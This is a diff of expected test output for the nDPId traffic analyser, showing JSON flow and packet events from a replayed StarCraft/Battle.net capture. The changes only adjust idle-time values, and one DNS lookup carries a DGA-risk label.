00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1437389956550,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389956550,"pkt":"hCYVPnXEIImEa8W6CABFAABIX2MAAIARVo\/AqAFkwKgB\/uXjADUANNVsy9IBAAABAAAAAAAAAjIyAjQwAzE5NAMxNzMHaW4tYWRkcgRhcnBhAAAMAAE="} 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"22.40.194.173.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -41,12 +41,12 @@ 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"110.212.58.216.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1437389956552,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1437389956552,"pkt":"IImEa8W6hCYVPnXECABFAACPAABAAEARtavAqAH+wKgBZAA15eMAe9\/glcSBgAABAAIAAAAAAzExMAMyMTICNTgDMjE2B2luLWFkZHIEYXJwYQAADAABwAwADAABAABT2QAcEG1pbDAxczI1LWluLWYxMTAFMWUxMDADbmV0AMAMAAwAAQAAU9kAEg9taWwwMXMyNS1pbi1mMTTASg=="} 
00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389956550,"flow_last_seen":1437389956552,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1437389956552,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"110.212.58.216.in-addr.arpa","num_queries":1,"num_answers":2,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389958129,"flow_last_seen":1437389958129,"flow_idle_time":7440000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":1,"thread_ts_msec":1437389958129,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1437389958129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1437389958129,"pkt":"hCYVPnXEIImEa8W6CABFAAA3SKVAAIAGzl7AqAFkUO\/QwQ1jBF+OUzht5cVUn1AY+ehDuQAA00l1ne7IFusS1wyd32Yu"} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1437389958226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389958226,"pkt":"IImEa8W6hCYVPnXECABFAAAoVBZAADQGDv1Q79DBwKgBZARfDWPlxVSfjlM4fFAQPaJ7fgAAAAAAAAAA"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389961548,"flow_last_seen":1437389961548,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1437389961548,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1437389961548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1437389961548,"pkt":"hCYVPnXEIImEa8W6CABFAAApPndAAIAGAKbAqAFkQOm4vArHFGzE+CH9edXaGlAQAPyZDAAAAA=="} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1437389961598,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389961598,"pkt":"IImEa8W6hCYVPnXECABFAAA0aJ8AACgGbnNA6bi8wKgBZBRsCsd51doaxPgh\/oAQAXGUkwAAAQEFCsT4If3E+CH+"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389958129,"flow_last_seen":1437389958129,"flow_idle_time":7560000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":1,"thread_ts_msec":1437389958129,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1437389958129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1437389958129,"pkt":"hCYVPnXEIImEa8W6CABFAAA3SKVAAIAGzl7AqAFkUO\/QwQ1jBF+OUzht5cVUn1AY+ehDuQAA00l1ne7IFusS1wyd32Yu"} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1437389958226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389958226,"pkt":"IImEa8W6hCYVPnXECABFAAAoVBZAADQGDv1Q79DBwKgBZARfDWPlxVSfjlM4fFAQPaJ7fgAAAAAAAAAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389961548,"flow_last_seen":1437389961548,"flow_idle_time":7560000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1437389961548,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1437389961548,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1437389961548,"pkt":"hCYVPnXEIImEa8W6CABFAAApPndAAIAGAKbAqAFkQOm4vArHFGzE+CH9edXaGlAQAPyZDAAAAA=="} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1437389961598,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389961598,"pkt":"IImEa8W6hCYVPnXECABFAAA0aJ8AACgGbnNA6bi8wKgBZBRsCsd51doaxPgh\/oAQAXGUkwAAAQEFCsT4If3E+CH+"} 00194{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":28,"source":"starcraft_battle.pcap","alias":"nDPId-test","layer_type":35020,"global_ts_msec":1437389962628} 00360{"packet_event_id":1,"packet_event_name":"packet","packet_id":28,"source":"starcraft_battle.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":58,"pkt_type":35020,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":58,"pkt_l4_len":0,"thread_ts_msec":1437389961598,"pkt":"AYDCAAAOIImEa8W6iMwCBwQgiYRrxboEBwMgiYRrxboGAg4R\/gkAEg8BAwABAAD+BwASuwEAAQEAAA=="} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389963466,"flow_last_seen":1437389963466,"flow_idle_time":180000,"flow_min_l4_payload_len":381,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1437389963466,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -54,69 +54,69 @@ 00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389963466,"flow_last_seen":1437389963466,"flow_idle_time":180000,"flow_min_l4_payload_len":381,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1437389963466,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00946{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1437389963467,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":414,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":414,"pkt_l4_len":380,"thread_ts_msec":1437389963467,"pkt":"AQBef\/\/6hCYVPnXECABFAAGQAABAAAERxbzAqAH+7\/\/\/+pbNB2wBfPulTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTYwDQpsT0NBVElPTjogaHR0cDovLzE5Mi4xNjguMS4yNTQ6NTcwNTIvcm9vdERlc2MwLnhtbA0KU0VSVkVSOiBFUElDRU5UUk8gVVBuUC8xLjAgTWluaVVQblBkLzEuNg0KTlQ6IHVwbnA6cm9vdGRldmljZQ0KVVNOOiB1dWlkOjExMjY2NzM2LWZhNTktMTFlNC05YzlmLTg0MjYxNTNlNzVjNDo6dXBucDpyb290ZGV2aWNlDQpOVFM6IHNzZHA6YWxpdmUNCk9QVDogImh0dHA6Ly9zY2hlbWFzLnVwbnAub3JnL3VwbnAvMS8wLyI7DQowMS1OTFM6IDENCkJPT1RJRC5VUE5QLk9SRzogMQ0KQ09ORklHSUQuVVBOUC5PUkc6IDEzMzcNCg0K"} 
00958{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1437389963467,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":423,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":423,"pkt_l4_len":389,"thread_ts_msec":1437389963467,"pkt":"AQBef\/\/6hCYVPnXECABFAAGZAABAAAERxbPAqAH+7\/\/\/+pbNB2wBhW9zTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTYwDQpsT0NBVElPTjogaHR0cDovLzE5Mi4xNjguMS4yNTQ6NTcwNTIvcm9vdERlc2MwLnhtbA0KU0VSVkVSOiBFUElDRU5UUk8gVVBuUC8xLjAgTWluaVVQblBkLzEuNg0KTlQ6IHV1aWQ6MTEyNjY3MzYtZmE1OS0xMWU0LTljOWYtODQyNjE1M2U3NWM0DQpVU046IHV1aWQ6MTEyNjY3MzYtZmE1OS0xMWU0LTljOWYtODQyNjE1M2U3NWM0DQpOVFM6IHNzZHA6YWxpdmUNCk9QVDogImh0dHA6Ly9zY2hlbWFzLnVwbnAub3JnL3VwbnAvMS8wLyI7DQowMS1OTFM6IDENCkJPT1RJRC5VUE5QLk9SRzogMQ0KQ09ORklHSUQuVVBOUC5PUkc6IDEzMzcNCg0K"} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1437389964511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437389964511,"pkt":"hCYVPnXEIImEa8W6CABFAAA8SKZAAIAGzljAqAFkUO\/QwQ1jBF+OUzh85cVUn1AY+eiiKgAAgb8pIAfuTigNRzF0YIhRn73AbVc="} 
-00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964518,"flow_last_seen":1437389964518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389964518,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1437389964518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964518,"pkt":"hCYVPnXEIImEa8W6CABFAAA0bDFAAIAGrOPAqAFkrcJx4A2yAFD3XxLXAAAAAIACIABVKAAAAgQFtAEDAwgBAQQC"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1437389964552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964552,"pkt":"IImEa8W6hCYVPnXECABFAAA0QI0AADUGY4itwnHgwKgBZABQDbI8Bg5O918S2IASp5SDTQAAAgQFlgEBBAIBAwMH"} 
-00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1437389964552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389964552,"pkt":"hCYVPnXEIImEa8W6CABFAAAobDJAAIAGrO7AqAFkrcJx4A2yAFD3XxLYPAYOT1AQAQBqlgAA"} -00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389964518,"flow_last_seen":1437389964552,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":350,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1437389964552,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"www.google-analytics.com","url":"www.google-analytics.com\/collect","code":0,"content_type":"","user_agent":"Battle.net\/1.3.0.5952"}} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1437389964511,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437389964511,"pkt":"hCYVPnXEIImEa8W6CABFAAA8SKZAAIAGzljAqAFkUO\/QwQ1jBF+OUzh85cVUn1AY+eiiKgAAgb8pIAfuTigNRzF0YIhRn73AbVc="} 
+00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964518,"flow_last_seen":1437389964518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389964518,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1437389964518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964518,"pkt":"hCYVPnXEIImEa8W6CABFAAA0bDFAAIAGrOPAqAFkrcJx4A2yAFD3XxLXAAAAAIACIABVKAAAAgQFtAEDAwgBAQQC"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1437389964552,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964552,"pkt":"IImEa8W6hCYVPnXECABFAAA0QI0AADUGY4itwnHgwKgBZABQDbI8Bg5O918S2IASp5SDTQAAAgQFlgEBBAIBAwMH"} 
+00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1437389964552,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389964552,"pkt":"hCYVPnXEIImEa8W6CABFAAAobDJAAIAGrO7AqAFkrcJx4A2yAFD3XxLYPAYOT1AQAQBqlgAA"} +00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389964518,"flow_last_seen":1437389964552,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":350,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1437389964552,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"www.google-analytics.com","url":"www.google-analytics.com\/collect","code":0,"content_type":"","user_agent":"Battle.net\/1.3.0.5952"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964752,"flow_last_seen":1437389964752,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1437389964752,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1437389964752,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1437389964752,"pkt":"hCYVPnXEIImEa8W6CABFAAA\/X2UAAIARVpbAqAFkwKgB\/up6ADUAK3heAXYBAAABAAAAAAAABGxsbncIYmxpenphcmQDY29tAAABAAE="} 00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964752,"flow_last_seen":1437389964752,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1437389964752,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"llnw.blizzard.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1437389964783,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1437389964783,"pkt":"hCYVPnXEIImEa8W6CABFAAA\/X2YAAIARVpXAqAFkwKgB\/up6ADUAK3heAXYBAAABAAAAAAAABGxsbncIYmxpenphcmQDY29tAAABAAE="} 
00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1437389964788,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":144,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":144,"pkt_l4_len":110,"thread_ts_msec":1437389964788,"pkt":"IImEa8W6hCYVPnXECABFAACCAABAAEARtbjAqAH+wKgBZAA16noAbnPyAXaBgAABAAMAAAAABGxsbncIYmxpenphcmQDY29tAAABAAHADAAFAAEAAFQfABcIYmxpenphcmQCdm8FbGxud2QDbmV0AMAvAAEAAQAAATwABFf43f7ALwABAAEAAAE8AARX+N39"} 00928{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389964752,"flow_last_seen":1437389964788,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1437389964788,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"llnw.blizzard.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"87.248.221.254"}} 
